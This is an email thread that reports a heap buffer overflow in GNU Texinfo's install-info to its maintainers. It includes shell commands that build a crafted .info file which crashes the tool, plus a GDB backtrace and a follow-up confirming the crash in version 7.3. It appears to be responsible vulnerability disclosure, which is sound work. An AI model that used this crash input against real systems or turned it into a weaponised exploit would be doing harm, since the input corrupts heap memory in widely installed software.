Hello again, I have an update. I just built GNU Texinfo 7.3 (the latest upstream release) from source and tested it in the same environment.

The crash is still present in version 7.3. On this version, the error manifests as:

malloc(): invalid size (unsorted)
IOT instruction (core dumped)

Best regards,
Leenear

On Mon, Apr 20, 2026 at 1:08 AM LogicLuminary <[email protected]> wrote:
> Dear Texinfo Maintainers,
>
> I hope you are doing well. I have discovered a heap buffer overflow in the
> install-info utility (GNU texinfo 7.1, 2023).
>
> *Tested Environment:*
>
> - *Version:* install-info (GNU texinfo) 7.1
> - *OS:* Ubuntu 24.04.3 LTS
>
> *Steps to Reproduce:*
>
> 1) Create a malicious .info file with excessive line-break expansion:
>
> echo "START-INFO-DIR-ENTRY" > overflow.info
> echo -n "* Crash: (crash). " >> overflow.info
> for i in {1..100}; do echo "A." >> overflow.info; done
> echo "END-INFO-DIR-ENTRY" >> overflow.info
>
> 2) Run: install-info overflow.info normal.dir
>
> *Observed Result:* The program crashes with malloc(): corrupted top size
> and a SIGABRT.
>
> *GDB Backtrace (Summary):*
>
> malloc(): corrupted top size
>
> Program received signal SIGABRT, Aborted.
> Download failed: Invalid argument. Continuing without source file
> ./nptl/./nptl/pthread_kill.c.
> __pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized
> out>) at ./nptl/pthread_kill.c:44
> warning: 44 ./nptl/pthread_kill.c: No such file or directory
> (gdb) bt
> #0 __pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized
> out>) at ./nptl/pthread_kill.c:44
> #1 __pthread_kill_internal (signo=6, threadid=<optimized out>) at
> ./nptl/pthread_kill.c:78
> #2 __GI___pthread_kill (threadid=<optimized out>, signo=signo@entry=6)
> at ./nptl/pthread_kill.c:89
> #3 0x00007ffff7c4527e in __GI_raise (sig=sig@entry=6) at
> ../sysdeps/posix/raise.c:26
> #4 0x00007ffff7c288ff in __GI_abort () at ./stdlib/abort.c:79
> #5 0x00007ffff7c297b6 in __libc_message_impl (fmt=fmt@entry=0x7ffff7dce8d7
> "%s\n")
> at ../sysdeps/posix/libc_fatal.c:134
> #6 0x00007ffff7ca8ff5 in malloc_printerr (str=str@entry=0x7ffff7dcc6f7
> "malloc(): corrupted top size")
> at ./malloc/malloc.c:5775
> #7 0x00007ffff7cac2fc in _int_malloc (av=av@entry=0x7ffff7e03ac0
> <main_arena>, bytes=bytes@entry=1659)
> at ./malloc/malloc.c:4447
> #8 0x00007ffff7cad812 in __GI___libc_malloc (bytes=bytes@entry=1659) at
> ./malloc/malloc.c:3328
> #9 0x0000555555559438 in xmalloc (s=1659) at ../gnulib/lib/xmalloc.c:43
> #10 format_entry (outstr_len=0x5555555721a0, outstr_out=0x555555572198,
> width=<optimized out>, align=35, calign=33,
> desc_len=399,
> desc=0x555555572340 "A. A. A. A. A. A. A. A. A. A. A. A.
> A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A.
> A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A.
> "...,
> name_len=17, name=0x555555572320 "* Crash: (crash).")
> at /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1446
> #11 reformat_new_entries (maxwidth_cli=<optimized out>,
> align_cli=<optimized out>, calign_cli=<optimized out>,
> entries=<optimized out>) at
> /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1716
> #12 main (argc=<optimized out>, argv=<optimized out>) at
> /usr/src/texinfo-7.1-3build2/install-info/install-info.c:2451
> (gdb)
>
> I would appreciate it if you could confirm this finding.
>
> Best regards,
> Leenear
>
